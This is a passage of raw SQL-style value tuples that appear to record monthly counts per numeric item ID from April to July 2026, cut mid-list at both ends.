(3531,1,'202604',9),(3721,1,'202604',9),(3746,1,'202604',9),(4238,1,'202604',9),(4323,1,'202604',9),(4326,1,'202604',9),(4691,1,'202604',9),(4712,1,'202604',9),(4996,1,'202604',9),(5058,1,'202604',9),(5071,1,'202604',9),(471,1,'202604',10),(476,1,'202604',10),(1584,1,'202604',10),(1701,1,'202604',10),(1724,1,'202604',10),(1739,1,'202604',10),(1766,1,'202604',10),(2751,1,'202604',10),(3534,1,'202604',10),(3774,1,'202604',10),(4520,1,'202604',10),(4674,1,'202604',10),(4741,1,'202604',10),(5125,1,'202604',10),(5163,1,'202604',10),(5601,1,'202604',10),(5609,1,'202604',10),(5636,1,'202604',10),(1703,1,'202604',11),(2956,1,'202604',11),(2989,1,'202604',11),(3041,1,'202604',11),(4329,1,'202604',11),(4338,1,'202604',11),(4608,1,'202604',11),(4651,1,'202604',11),(4750,1,'202604',11),(4980,1,'202604',11),(5046,1,'202604',11),(5298,1,'202604',11),(5323,1,'202604',11),(5353,1,'202604',11),(5425,1,'202604',11),(5433,1,'202604',11),(5593,1,'202604',11),(102,1,'202604',12),(110,1,'202604',12),(1734,1,'202604',12),(2809,1,'202604',12),(3307,1,'202604',12),(3724,1,'202604',12),(3731,1,'202604',12),(4420,1,'202604',12),(4448,1,'202604',12),(4529,1,'202604',12),(4776,1,'202604',12),(4874,1,'202604',12),(5054,1,'202604',12),(5128,1,'202604',12),(5268,1,'202604',12),(5317,1,'202604',12),(5359,1,'202604',12),(5363,1,'202604',12),(5415,1,'202604',12),(5578,1,'202604',12),(5626,1,'202604',12),(570,1,'202604',13),(3117,1,'202604',13),(3313,1,'202604',13),(4400,1,'202604',13),(5314,1,'202604',13),(1606,1,'202604',14),(1608,1,'202604',14),(1610,1,'202604',14),(1705,1,'202604',14),(3023,1,'202604',14),(3060,1,'202604',14),(3297,1,'202604',14),(4753,1,'202604',14),(5067,1,'202604',14),(5515,1,'202604',14),(2804,1,'202604',15),(3777,1,'202604',15),(4983,1,'202604',15),(5276,1,'202604',15),(5492,1,'202604',15),(5582,1,'202604',15),(5683,1,'202604',15),(483,1,'202604',16),(1604,1,'202604',16),(2309,1,'202604',16),(4335,1,'202604',16),(4436,1,'202604',16),(5080,1,'202604',16),(5259,1,'202604',16),(5292,1,'202604',16),(5307,1,'202604',16),(5441,1,'202604',16),(5512,1,'202604',16),(5662,1,'202604',16),(467,1,'202604',17),(469,1,'202604',17),(487,1,'202604',17),(1588,1,'202604',17),(2297,1,'202604',17),(3749,1,'202604',17),(4612,1,'202604',17),(5472,1,'202604',17),(5674,1,'202604',17),(108,1,'202604',18),(4556,1,'202604',18),(5280,1,'202604',18),(5412,1,'202604',18),(5449,1,'202604',18),(5561,1,'202604',18),(2503,1,'202604',19),(2775,1,'202604',19),(5153,1,'202604',19),(5409,1,'202604',19),(5436,1,'202604',19),(1600,1,'202604',20),(1728,1,'202604',20),(3102,1,'202604',20),(3259,1,'202604',20),(4722,1,'202604',20),(335,1,'202604',21),(3083,1,'202604',21),(5076,1,'202604',21),(5400,1,'202604',21),(5567,1,'202604',21),(5605,1,'202604',21),(5666,1,'202604',21),(1778,1,'202604',22),(5397,1,'202604',22),(5461,1,'202604',22),(1598,1,'202604',23),(1614,1,'202604',23),(2704,1,'202604',23),(5464,1,'202604',23),(5489,1,'202604',24),(5428,1,'202604',25),(5454,1,'202604',25),(5467,1,'202604',25),(84,1,'202604',26),(1586,1,'202604',26),(1780,1,'202604',26),(5696,1,'202604',26),(87,1,'202604',27),(5457,1,'202604',27),(5598,1,'202604',27),(1544,1,'202604',28),(4930,1,'202604',28),(5570,1,'202604',28),(468,1,'202604',29),(5271,1,'202604',29),(5420,1,'202604',31),(5502,1,'202604',31),(91,1,'202604',32),(2813,1,'202604',32),(5406,1,'202604',32),(3781,1,'202604',34),(470,1,'202604',35),(1602,1,'202604',36),(2769,1,'202604',36),(474,1,'202604',37),(74,1,'202604',40),(1582,1,'202604',44),(68,1,'202604',50),(72,1,'202604',53),(89,1,'202604',53),(76,1,'202604',61),(5700,1,'202604',63),(2904,1,'202604',89),(80,1,'202604',238),(9,1,'202604',2352),(4587,1,'202605',3),(1737,1,'202605',4),(1741,1,'202605',4),(2293,1,'202605',4),(2296,1,'202605',4),(4706,1,'202605',4),(1705,1,'202605',5),(2156,1,'202605',5),(3087,1,'202605',5),(3261,1,'202605',5),(3275,1,'202605',5),(3430,1,'202605',5),(4416,1,'202605',5),(4651,1,'202605',5),(106,1,'202605',6),(1713,1,'202605',6),(1745,1,'202605',6),(2063,1,'202605',6),(2252,1,'202605',6),(3249,1,'202605',6),(3251,1,'202605',6),(3253,1,'202605',6),(3263,1,'202605',6),(3267,1,'202605',6),(3280,1,'202605',6),(3285,1,'202605',6),(3316,1,'202605',6),(3531,1,'202605',6),(3731,1,'202605',6),(3735,1,'202605',6),(4432,1,'202605',6),(4654,1,'202605',6),(4668,1,'202605',6),(4685,1,'202605',6),(4759,1,'202605',6),(4762,1,'202605',6),(4765,1,'202605',6),(4866,1,'202605',6),(4883,1,'202605',6),(5378,1,'202605',6),(5582,1,'202605',6),(1720,1,'202605',7),(1722,1,'202605',7),(1732,1,'202605',7),(1772,1,'202605',7),(3257,1,'202605',7),(3265,1,'202605',7),(3269,1,'202605',7),(3278,1,'202605',7),(4396,1,'202605',7),(4440,1,'202605',7),(4688,1,'202605',7),(4691,1,'202605',7),(4700,1,'202605',7),(4756,1,'202605',7),(4878,1,'202605',7),(4888,1,'202605',7),(4976,1,'202605',7),(5295,1,'202605',7),(1739,1,'202605',8),(1770,1,'202605',8),(1774,1,'202605',8),(2911,1,'202605',8),(3027,1,'202605',8),(3034,1,'202605',8),(3063,1,'202605',8),(3090,1,'202605',8),(3097,1,'202605',8),(3229,1,'202605',8),(3259,1,'202605',8),(3482,1,'202605',8),(3541,1,'202605',8),(3714,1,'202605',8),(3727,1,'202605',8),(3738,1,'202605',8),(4404,1,'202605',8),(4408,1,'202605',8),(4424,1,'202605',8),(4444,1,'202605',8),(4591,1,'202605',8),(4648,1,'202605',8),(4694,1,'202605',8),(4697,1,'202605',8),(4797,1,'202605',8),(4858,1,'202605',8),(4897,1,'202605',8),(5071,1,'202605',8),(5122,1,'202605',8),(5128,1,'202605',8),(5137,1,'202605',8),(5256,1,'202605',8),(5310,1,'202605',8),(5636,1,'202605',8),(484,1,'202605',9),(1695,1,'202605',9),(1699,1,'202605',9),(1751,1,'202605',9),(1768,1,'202605',9),(2148,1,'202605',9),(2161,1,'202605',9),(2751,1,'202605',9),(2801,1,'202605',9),(2965,1,'202605',9),(2989,1,'202605',9),(3104,1,'202605',9),(3107,1,'202605',9),(3273,1,'202605',9),(3282,1,'202605',9),(3489,1,'202605',9),(3749,1,'202605',9),(3771,1,'202605',9),(4420,1,'202605',9),(4428,1,'202605',9),(4517,1,'202605',9),(4551,1,'202605',9),(4608,1,'202605',9),(4674,1,'202605',9),(4870,1,'202605',9),(4988,1,'202605',9),(5037,1,'202605',9),(5058,1,'202605',9),(5140,1,'202605',9),(479,1,'202605',10),(480,1,'202605',10),(1701,1,'202605',10),(1711,1,'202605',10),(1715,1,'202605',10),(1718,1,'202605',10),(1726,1,'202605',10),(1747,1,'202605',10),(1776,1,'202605',10),(1782,1,'202605',10),(2154,1,'202605',10),(2809,1,'202605',10),(2993,1,'202605',10),(3041,1,'202605',10),(3092,1,'202605',10),(3109,1,'202605',10),(3247,1,'202605',10),(3290,1,'202605',10),(3307,1,'202605',10),(3710,1,'202605',10),(3724,1,'202605',10),(3752,1,'202605',10),(4338,1,'202605',10),(4341,1,'202605',10),(4373,1,'202605',10),(4412,1,'202605',10),(4448,1,'202605',10),(4514,1,'202605',10),(4556,1,'202605',10),(4771,1,'202605',10),(4802,1,'202605',10),(4996,1,'202605',10),(5020,1,'202605',10),(5046,1,'202605',10),(5101,1,'202605',10),(5153,1,'202605',10),(5301,1,'202605',10),(5323,1,'202605',10),(5330,1,'202605',10),(5356,1,'202605',10),(5383,1,'202605',10),(5585,1,'202605',10),(476,1,'202605',11),(1707,1,'202605',11),(1728,1,'202605',11),(1730,1,'202605',11),(2178,1,'202605',11),(2248,1,'202605',11),(2964,1,'202605',11),(2991,1,'202605',11),(3079,1,'202605',11),(3245,1,'202605',11),(3287,1,'202605',11),(3721,1,'202605',11),(4238,1,'202605',11),(4382,1,'202605',11),(4520,1,'202605',11),(4546,1,'202605',11),(4709,1,'202605',11),(4744,1,'202605',11),(4893,1,'202605',11),(5024,1,'202605',11),(5050,1,'202605',11),(5134,1,'202605',11),(5248,1,'202605',11),(5264,1,'202605',11),(5289,1,'202605',11),(5304,1,'202605',11),(5320,1,'202605',11),(5353,1,'202605',11),(5374,1,'202605',11),(5601,1,'202605',11),(471,1,'202605',12),(481,1,'202605',12),(482,1,'202605',12),(483,1,'202605',12),(1709,1,'202605',12),(2165,1,'202605',12),(2658,1,'202605',12),(3045,1,'202605',12),(3096,1,'202605',12),(3243,1,'202605',12),(3534,1,'202605',12),(4566,1,'202605',12),(4657,1,'202605',12),(4741,1,'202605',12),(4747,1,'202605',12),(4768,1,'202605',12),(5028,1,'202605',12),(5042,1,'202605',12),(5067,1,'202605',12),(5131,1,'202605',12),(5683,1,'202605',12),(485,1,'202605',13),(488,1,'202605',13),(1703,1,'202605',13),(1724,1,'202605',13),(1743,1,'202605',13),(1766,1,'202605',13),(2159,1,'202605',13),(2609,1,'202605',13),(2804,1,'202605',13),(2956,1,'202605',13),(3069,1,'202605',13),(3072,1,'202605',13),(3127,1,'202605',13),(4332,1,'202605',13),(4335,1,'202605',13),(4377,1,'202605',13),(4542,1,'202605',13),(4612,1,'202605',13),(4645,1,'202605',13),(4663,1,'202605',13),(4750,1,'202605',13),(5268,1,'202605',13),(5359,1,'202605',13),(5363,1,'202605',13),(5561,1,'202605',13),(5567,1,'202605',13),(5609,1,'202605',13),(102,1,'202605',14),(110,1,'202605',14),(486,1,'202605',14),(1592,1,'202605',14),(1734,1,'202605',14),(1749,1,'202605',14),(2150,1,'202605',14),(2457,1,'202605',14),(2748,1,'202605',14),(2813,1,'202605',14),(3004,1,'202605',14),(3023,1,'202605',14),(3226,1,'202605',14),(3271,1,'202605',14),(3313,1,'202605',14),(3438,1,'202605',14),(3479,1,'202605',14),(4357,1,'202605',14),(4391,1,'202605',14),(4400,1,'202605',14),(4524,1,'202605',14),(4703,1,'202605',14),(4862,1,'202605',14),(4983,1,'202605',14),(5163,1,'202605',14),(5253,1,'202605',14),(5334,1,'202605',14),(5515,1,'202605',14),(5578,1,'202605',14),(5598,1,'202605',14),(5605,1,'202605',14),(3005,1,'202605',15),(3066,1,'202605',15),(3240,1,'202605',15),(3746,1,'202605',15),(3774,1,'202605',15),(4275,1,'202605',15),(4301,1,'202605',15),(4326,1,'202605',15),(4363,1,'202605',15),(4368,1,'202605',15),(4582,1,'202605',15),(4677,1,'202605',15),(4980,1,'202605',15),(5054,1,'202605',15),(5125,1,'202605',15),(5292,1,'202605',15),(5314,1,'202605',15),(5326,1,'202605',15),(5662,1,'202605',15),(472,1,'202605',16),(478,1,'202605',16),(1590,1,'202605',16),(1596,1,'202605',16),(1606,1,'202605',16),(1697,1,'202605',16),(2558,1,'202605',16),(2769,1,'202605',16),(3006,1,'202605',16),(3030,1,'202605',16),(3117,1,'202605',16),(3124,1,'202605',16),(3297,1,'202605',16),(3742,1,'202605',16),(4323,1,'202605',16),(4387,1,'202605',16),(4660,1,'202605',16),(4681,1,'202605',16),(4874,1,'202605',16),(5146,1,'202605',16),(5276,1,'202605',16),(5317,1,'202605',16),(5425,1,'202605',16),(5674,1,'202605',16),(1780,1,'202605',17),(2309,1,'202605',17),(3764,1,'202605',17),(4454,1,'202605',17),(4753,1,'202605',17),(4776,1,'202605',17),(5467,1,'202605',17),(5512,1,'202605',17),(1612,1,'202605',18),(3777,1,'202605',18),(4329,1,'202605',18),(4457,1,'202605',18),(4529,1,'202605',18),(4712,1,'202605',18),(5033,1,'202605',18),(5298,1,'202605',18),(5307,1,'202605',18),(5461,1,'202605',18),(5626,1,'202605',18),(469,1,'202605',19),(2152,1,'202605',19),(2297,1,'202605',19),(3038,1,'202605',19),(3486,1,'202605',19),(5062,1,'202605',19),(5280,1,'202605',19),(5412,1,'202605',19),(477,1,'202605',20),(1584,1,'202605',20),(2617,1,'202605',20),(5076,1,'202605',20),(5271,1,'202605',20),(5570,1,'202605',20),(3060,1,'202605',21),(4436,1,'202605',21),(4722,1,'202605',21),(5415,1,'202605',21),(5449,1,'202605',21),(5489,1,'202605',21),(5492,1,'202605',21),(487,1,'202605',22),(1610,1,'202605',22),(4792,1,'202605',22),(4977,1,'202605',22),(5433,1,'202605',22),(5454,1,'202605',22),(5457,1,'202605',22),(5666,1,'202605',22),(1586,1,'202605',23),(5080,1,'202605',23),(5259,1,'202605',23),(5441,1,'202605',23),(5464,1,'202605',23),(467,1,'202605',24),(1544,1,'202605',24),(5400,1,'202605',24),(84,1,'202605',25),(570,1,'202605',25),(5157,1,'202605',25),(5593,1,'202605',25),(473,1,'202605',26),(1608,1,'202605',26),(2775,1,'202605',26),(5696,1,'202605',26),(468,1,'202605',27),(1594,1,'202605',27),(1778,1,'202605',27),(3498,1,'202605',27),(1588,1,'202605',28),(1600,1,'202605',28),(470,1,'202605',29),(1604,1,'202605',29),(2704,1,'202605',29),(3102,1,'202605',29),(4930,1,'202605',29),(5436,1,'202605',29),(335,1,'202605',30),(1598,1,'202605',30),(5409,1,'202605',30),(5472,1,'202605',30),(5700,1,'202605',30),(87,1,'202605',31),(108,1,'202605',33),(1614,1,'202605',33),(3083,1,'202605',34),(5406,1,'202605',36),(2503,1,'202605',37),(5397,1,'202605',37),(5428,1,'202605',37),(74,1,'202605',38),(1602,1,'202605',38),(2904,1,'202605',41),(5502,1,'202605',41),(5735,1,'202605',41),(1582,1,'202605',42),(5738,1,'202605',42),(5420,1,'202605',43),(474,1,'202605',45),(3781,1,'202605',50),(91,1,'202605',52),(68,1,'202605',57),(5762,1,'202605',65),(76,1,'202605',69),(89,1,'202605',78),(72,1,'202605',83),(80,1,'202605',114),(9,1,'202605',2145),(486,1,'202606',1),(4432,1,'202606',1),(3735,1,'202606',2),(4792,1,'202606',2),(106,1,'202606',3),(478,1,'202606',3),(482,1,'202606',3),(2063,1,'202606',3),(2248,1,'202606',3),(2989,1,'202606',3),(3261,1,'202606',3),(3282,1,'202606',3),(3290,1,'202606',3),(4514,1,'202606',3),(4685,1,'202606',3),(4747,1,'202606',3),(4797,1,'202606',3),(110,1,'202606',4),(1726,1,'202606',4),(1737,1,'202606',4),(1741,1,'202606',4),(1768,1,'202606',4),(2148,1,'202606',4),(2809,1,'202606',4),(3090,1,'202606',4),(3265,1,'202606',4),(3271,1,'202606',4),(3275,1,'202606',4),(3297,1,'202606',4),(3534,1,'202606',4),(4329,1,'202606',4),(4668,1,'202606',4),(4674,1,'202606',4),(4893,1,'202606',4),(5050,1,'202606',4),(1695,1,'202606',5),(1732,1,'202606',5),(1747,1,'202606',5),(1766,1,'202606',5),(1776,1,'202606',5),(2161,1,'202606',5),(2293,1,'202606',5),(3034,1,'202606',5),(3045,1,'202606',5),(3063,1,'202606',5),(3226,1,'202606',5),(3251,1,'202606',5),(3273,1,'202606',5),(3541,1,'202606',5),(3714,1,'202606',5),(3742,1,'202606',5),(3752,1,'202606',5),(4323,1,'202606',5),(4416,1,'202606',5),(4420,1,'202606',5),(4428,1,'202606',5),(4712,1,'202606',5),(4874,1,'202606',5),(5042,1,'202606',5),(5054,1,'202606',5),(5128,1,'202606',5),(5140,1,'202606',5),(5264,1,'202606',5),(5295,1,'202606',5),(5383,1,'202606',5),(5425,1,'202606',5),(5605,1,'202606',5),(479,1,'202606',6),(1745,1,'202606',6),(1774,1,'202606',6),(2154,1,'202606',6),(2156,1,'202606',6),(2165,1,'202606',6),(2617,1,'202606',6),(2751,1,'202606',6),(3030,1,'202606',6),(3107,1,'202606',6),(3117,1,'202606',6),(3269,1,'202606',6),(4391,1,'202606',6),(4404,1,'202606',6),(4440,1,'202606',6),(4566,1,'202606',6),(4587,1,'202606',6),(4651,1,'202606',6),(4694,1,'202606',6),(4697,1,'202606',6),(4700,1,'202606',6),(4741,1,'202606',6),(4883,1,'202606',6),(4988,1,'202606',6),(4996,1,'202606',6),(5028,1,'202606',6),(5058,1,'202606',6),(5071,1,'202606',6),(5131,1,'202606',6),(5301,1,'202606',6),(5320,1,'202606',6),(5323,1,'202606',6),(484,1,'202606',7),(1701,1,'202606',7),(1722,1,'202606',7),(1724,1,'202606',7),(1730,1,'202606',7),(1749,1,'202606',7),(1770,1,'202606',7),(2152,1,'202606',7),(2296,1,'202606',7),(2748,1,'202606',7),(3069,1,'202606',7),(3087,1,'202606',7),(3245,1,'202606',7),(3247,1,'202606',7),(3259,1,'202606',7),(3263,1,'202606',7),(3267,1,'202606',7),(3278,1,'202606',7),(3287,1,'202606',7),(3482,1,'202606',7),(3531,1,'202606',7),(4238,1,'202606',7),(4338,1,'202606',7),(4357,1,'202606',7),(4377,1,'202606',7),(4382,1,'202606',7),(4454,1,'202606',7),(4546,1,'202606',7),(4759,1,'202606',7),(4776,1,'202606',7),(5046,1,'202606',7),(5289,1,'202606',7),(5326,1,'202606',7),(5330,1,'202606',7),(102,1,'202606',8),(480,1,'202606',8),(481,1,'202606',8),(483,1,'202606',8),(1596,1,'202606',8),(1606,1,'202606',8),(1699,1,'202606',8),(1703,1,'202606',8),(1709,1,'202606',8),(1743,1,'202606',8),(1782,1,'202606',8),(3092,1,'202606',8),(3097,1,'202606',8),(3249,1,'202606',8),(3253,1,'202606',8),(3257,1,'202606',8),(3479,1,'202606',8),(3721,1,'202606',8),(3731,1,'202606',8),(4412,1,'202606',8),(4448,1,'202606',8),(4517,1,'202606',8),(4582,1,'202606',8),(4648,1,'202606',8),(4762,1,'202606',8),(4768,1,'202606',8),(4771,1,'202606',8),(4802,1,'202606',8),(4897,1,'202606',8),(5153,1,'202606',8),(5256,1,'202606',8),(5314,1,'202606',8),(5317,1,'202606',8),(5512,1,'202606',8),(469,1,'202606',9),(487,1,'202606',9),(488,1,'202606',9),(1739,1,'202606',9),(2252,1,'202606',9),(2801,1,'202606',9),(2911,1,'202606',9),(2964,1,'202606',9),(2965,1,'202606',9),(2993,1,'202606',9),(3079,1,'202606',9),(3096,1,'202606',9),(3104,1,'202606',9),(3243,1,'202606',9),(3280,1,'202606',9),(3489,1,'202606',9),(3710,1,'202606',9),(3738,1,'202606',9),(4326,1,'202606',9),(4373,1,'202606',9),(4387,1,'202606',9),(4396,1,'202606',9),(4424,1,'202606',9),(4703,1,'202606',9),(4870,1,'202606',9),(4983,1,'202606',9),(5024,1,'202606',9),(5253,1,'202606',9),(5298,1,'202606',9),(5356,1,'202606',9),(5359,1,'202606',9),(5374,1,'202606',9),(477,1,'202606',10),(1594,1,'202606',10),(1734,1,'202606',10),(2503,1,'202606',10),(3023,1,'202606',10),(3027,1,'202606',10),(3041,1,'202606',10),(3240,1,'202606',10),(3771,1,'202606',10),(3774,1,'202606',10),(4332,1,'202606',10),(4363,1,'202606',10),(4368,1,'202606',10),(4400,1,'202606',10),(4408,1,'202606',10),(4645,1,'202606',10),(4654,1,'202606',10),(4677,1,'202606',10),(4681,1,'202606',10),(4858,1,'202606',10),(4862,1,'202606',10),(4888,1,'202606',10),(4976,1,'202606',10),(4977,1,'202606',10),(4980,1,'202606',10),(5020,1,'202606',10),(5067,1,'202606',10),(5157,1,'202606',10),(5248,1,'202606',10),(5276,1,'202606',10),(5280,1,'202606',10),(5292,1,'202606',10),(5492,1,'202606',10),(5578,1,'202606',10),(471,1,'202606',11),(472,1,'202606',11),(485,1,'202606',11),(1718,1,'202606',11),(1751,1,'202606',11),(2150,1,'202606',11),(2178,1,'202606',11),(2991,1,'202606',11),(3005,1,'202606',11),(3127,1,'202606',11),(3229,1,'202606',11),(3777,1,'202606',11),(4301,1,'202606',11),(4341,1,'202606',11),(4444,1,'202606',11),(4551,1,'202606',11),(4688,1,'202606',11),(4706,1,'202606',11),(4744,1,'202606',11),(4756,1,'202606',11),(5033,1,'202606',11),(5101,1,'202606',11),(5125,1,'202606',11),(5146,1,'202606',11),(5334,1,'202606',11),(5415,1,'202606',11),(5666,1,'202606',11),(74,1,'202606',12),(1707,1,'202606',12),(1713,1,'202606',12),(1720,1,'202606',12),(2159,1,'202606',12),(3038,1,'202606',12),(3285,1,'202606',12),(3313,1,'202606',12),(3438,1,'202606',12),(3724,1,'202606',12),(4524,1,'202606',12),(4529,1,'202606',12),(4556,1,'202606',12),(4591,1,'202606',12),(4612,1,'202606',12),(4657,1,'202606',12),(5037,1,'202606',12),(5134,1,'202606',12),(5259,1,'202606',12),(5304,1,'202606',12),(5353,1,'202606',12),(5570,1,'202606',12),(5582,1,'202606',12),(5609,1,'202606',12),(5700,1,'202606',12),(84,1,'202606',13),(1598,1,'202606',13),(1600,1,'202606',13),(1711,1,'202606',13),(2309,1,'202606',13),(2609,1,'202606',13),(2658,1,'202606',13),(3066,1,'202606',13),(3727,1,'202606',13),(3746,1,'202606',13),(4275,1,'202606',13),(4542,1,'202606',13),(4608,1,'202606',13),(4866,1,'202606',13),(5080,1,'202606',13),(5412,1,'202606',13),(5585,1,'202606',13),(473,1,'202606',14),(476,1,'202606',14),(1592,1,'202606',14),(1612,1,'202606',14),(2558,1,'202606',14),(3006,1,'202606',14),(3124,1,'202606',14),(3316,1,'202606',14),(3764,1,'202606',14),(4691,1,'202606',14),(4878,1,'202606',14),(5062,1,'202606',14),(5163,1,'202606',14),(5378,1,'202606',14),(5400,1,'202606',14),(5433,1,'202606',14),(5561,1,'202606',14),(5626,1,'202606',14),(5636,1,'202606',14),(5662,1,'202606',14),(1590,1,'202606',15),(1697,1,'202606',15),(1715,1,'202606',15),(1780,1,'202606',15),(2457,1,'202606',15),(2804,1,'202606',15),(3109,1,'202606',15),(3430,1,'202606',15),(3749,1,'202606',15),(4457,1,'202606',15),(4709,1,'202606',15),(4765,1,'202606',15),(5268,1,'202606',15),(5310,1,'202606',15),(5457,1,'202606',15),(5461,1,'202606',15),(5674,1,'202606',15),(1610,1,'202606',16),(2956,1,'202606',16),(3498,1,'202606',16),(4753,1,'202606',16),(5271,1,'202606',16),(5363,1,'202606',16),(5449,1,'202606',16),(5472,1,'202606',16),(5601,1,'202606',16),(470,1,'202606',17),(1584,1,'202606',17),(1778,1,'202606',17),(3102,1,'202606',17),(3307,1,'202606',17),(4335,1,'202606',17),(4436,1,'202606',17),(4520,1,'202606',17),(5137,1,'202606',17),(5307,1,'202606',17),(5489,1,'202606',17),(108,1,'202606',18),(467,1,'202606',18),(468,1,'202606',18),(570,1,'202606',18),(2813,1,'202606',18),(3004,1,'202606',18),(3072,1,'202606',18),(4750,1,'202606',18),(5076,1,'202606',18),(5441,1,'202606',18),(5515,1,'202606',18),(87,1,'202606',19),(335,1,'202606',19),(1604,1,'202606',19),(1772,1,'202606',19),(5683,1,'202606',19),(4660,1,'202606',20),(4663,1,'202606',20),(4722,1,'202606',20),(5436,1,'202606',20),(5567,1,'202606',20),(5593,1,'202606',20),(2297,1,'202606',21),(2904,1,'202606',21),(4930,1,'202606',21),(5464,1,'202606',21),(5467,1,'202606',21),(5735,1,'202606',21),(5771,1,'202606',21),(5409,1,'202606',22),(5454,1,'202606',22),(1608,1,'202606',23),(1614,1,'202606',23),(3486,1,'202606',24),(5428,1,'202606',24),(5598,1,'202606',24),(5696,1,'202606',24),(2704,1,'202606',25),(3083,1,'202606',25),(1728,1,'202606',26),(2769,1,'202606',26),(5738,1,'202606',26),(1544,1,'202606',28),(1586,1,'202606',28),(2775,1,'202606',29),(1588,1,'202606',30),(3781,1,'202606',30),(5122,1,'202606',31),(5420,1,'202606',31),(5502,1,'202606',31),(91,1,'202606',34),(5397,1,'202606',35),(1602,1,'202606',36),(68,1,'202606',37),(474,1,'202606',37),(5762,1,'202606',42),(72,1,'202606',44),(5769,1,'202606',44),(1582,1,'202606',51),(76,1,'202606',52),(89,1,'202606',52),(1705,1,'202606',52),(5406,1,'202606',73),(80,1,'202606',177),(3060,1,'202606',205),(9,1,'202606',2494),(1732,1,'202607',1),(4357,1,'202607',1),(1697,1,'202607',2),(1709,1,'202607',2),(1726,1,'202607',2),(3269,1,'202607',2),(4382,1,'202607',2),(4712,1,'202607',2),(5020,1,'202607',2),(5317,1,'202607',2),(106,1,'202607',3),(1705,1,'202607',3),(1713,1,'202607',3),(1720,1,'202607',3),(1776,1,'202607',3),(2154,1,'202607',3),(2165,1,'202607',3),(2178,1,'202607',3),(2911,1,'202607',3),(3063,1,'202607',3),(3245,1,'202607',3),(3273,1,'202607',3),(3482,1,'202607',3),(3534,1,'202607',3),(3714,1,'202607',3),(3735,1,'202607',3),(4323,1,'202607',3),(4517,1,'202607',3),(4668,1,'202607',3),(4762,1,'202607',3),(4768,1,'202607',3),(4878,1,'202607',3),(483,1,'202607',4),(1699,1,'202607',4),(1707,1,'202607',4),(1711,1,'202607',4),(1715,1,'202607',4),(1751,1,'202607',4),(2150,1,'202607',4),(2252,1,'202607',4),(2296,1,'202607',4),(2751,1,'202607',4),(2991,1,'202607',4),(3097,1,'202607',4),(3109,1,'202607',4),(3278,1,'202607',4),(3430,1,'202607',4),(3486,1,'202607',4),(3489,1,'202607',4),(3531,1,'202607',4),(4238,1,'202607',4),(4329,1,'202607',4),(4338,1,'202607',4),(4648,1,'202607',4),(4674,1,'202607',4),(4691,1,'202607',4),(4694,1,'202607',4),(4706,1,'202607',4),(4709,1,'202607',4),(4747,1,'202607',4),(4976,1,'202607',4),(4996,1,'202607',4),(5042,1,'202607',4),(5050,1,'202607',4),(5585,1,'202607',4),(477,1,'202607',5),(482,1,'202607',5),(1730,1,'202607',5),(1747,1,'202607',5),(1749,1,'202607',5),(1782,1,'202607',5),(2063,1,'202607',5),(2609,1,'202607',5),(3066,1,'202607',5),(3069,1,'202607',5),(3090,1,'202607',5),(3096,1,'202607',5),(3104,1,'202607',5),(3107,1,'202607',5),(3257,1,'202607',5),(3271,1,'202607',5),(3275,1,'202607',5),(3282,1,'202607',5),(3285,1,'202607',5),(3287,1,'202607',5),(3290,1,'202607',5),(3541,1,'202607',5),(3721,1,'202607',5),(3742,1,'202607',5),(4363,1,'202607',5),(4377,1,'202607',5),(4514,1,'202607',5),(4685,1,'202607',5),(4688,1,'202607',5),(4862,1,'202607',5),(4888,1,'202607',5),(4988,1,'202607',5),(5101,1,'202607',5),(5289,1,'202607',5),(5330,1,'202607',5),(472,1,'202607',6),(1734,1,'202607',6),(1737,1,'202607',6),(1743,1,'202607',6),(2148,1,'202607',6),(2161,1,'202607',6),(2248,1,'202607',6),(2809,1,'202607',6),(2993,1,'202607',6),(3087,1,'202607',6),(3247,1,'202607',6),(3280,1,'202607',6),(3771,1,'202607',6),(3777,1,'202607',6),(4275,1,'202607',6),(4332,1,'202607',6),(4396,1,'202607',6),(4408,1,'202607',6),(4412,1,'202607',6),(4428,1,'202607',6),(4432,1,'202607',6),(4454,1,'202607',6),(4654,1,'202607',6),(4663,1,'202607',6),(4703,1,'202607',6),(4744,1,'202607',6),(4771,1,'202607',6),(4797,1,'202607',6),(4858,1,'202607',6),(4893,1,'202607',6),(5037,1,'202607',6),(5046,1,'202607',6),(5268,1,'202607',6),(5295,1,'202607',6),(5301,1,'202607',6),(5582,1,'202607',6),(480,1,'202607',7),(488,1,'202607',7),(1695,1,'202607',7),(1745,1,'202607',7),(2293,1,'202607',7),(2964,1,'202607',7),(3034,1,'202607',7),(3038,1,'202607',7),(3079,1,'202607',7),(3316,1,'202607',7),(3724,1,'202607',7),(4524,1,'202607',7),(4546,1,'202607',7),(4582,1,'202607',7),(4677,1,'202607',7),(4697,1,'202607',7),(4753,1,'202607',7),(4756,1,'202607',7),(4874,1,'202607',7),(4977,1,'202607',7),(5033,1,'202607',7),(5122,1,'202607',7),(5128,1,'202607',7),(5292,1,'202607',7),(5359,1,'202607',7),(5464,1,'202607',7),(478,1,'202607',8),(481,1,'202607',8),(1590,1,'202607',8),(1701,1,'202607',8),(1703,1,'202607',8),(1741,1,'202607',8),(3117,1,'202607',8),(3124,1,'202607',8),(3240,1,'202607',8),(3243,1,'202607',8),(3438,1,'202607',8),(3774,1,'202607',8),(4341,1,'202607',8),(4373,1,'202607',8),(4400,1,'202607',8),(4404,1,'202607',8),(4566,1,'202607',8),(4657,1,'202607',8),(4681,1,'202607',8),(5134,1,'202607',8),(5253,1,'202607',8),(5271,1,'202607',8),(5304,1,'202607',8),(5310,1,'202607',8),(5356,1,'202607',8),(5412,1,'202607',8),(5674,1,'202607',8),(479,1,'202607',9),(1766,1,'202607',9),(1772,1,'202607',9),(2658,1,'202607',9),(2801,1,'202607',9),(3027,1,'202607',9),(3041,1,'202607',9),(3259,1,'202607',9),(3267,1,'202607',9),(3313,1,'202607',9),(3479,1,'202607',9),(3498,1,'202607',9),(3727,1,'202607',9),(3731,1,'202607',9),(3738,1,'202607',9),(3752,1,'202607',9),(3764,1,'202607',9),(4335,1,'202607',9),(4440,1,'202607',9),(4444,1,'202607',9),(4883,1,'202607',9),(5028,1,'202607',9),(5058,1,'202607',9),(5125,1,'202607',9),(5131,1,'202607',9),(5264,1,'202607',9),(5298,1,'202607',9),(5378,1,'202607',9),(5425,1,'202607',9),(5467,1,'202607',9),(5472,1,'202607',9),(5666,1,'202607',9),(484,1,'202607',10),(485,1,'202607',10),(486,1,'202607',10),(1596,1,'202607',10),(1722,1,'202607',10),(1724,1,'202607',10),(1768,1,'202607',10),(2558,1,'202607',10),(2748,1,'202607',10),(2956,1,'202607',10),(2965,1,'202607',10),(3127,1,'202607',10),(3229,1,'202607',10),(3307,1,'202607',10)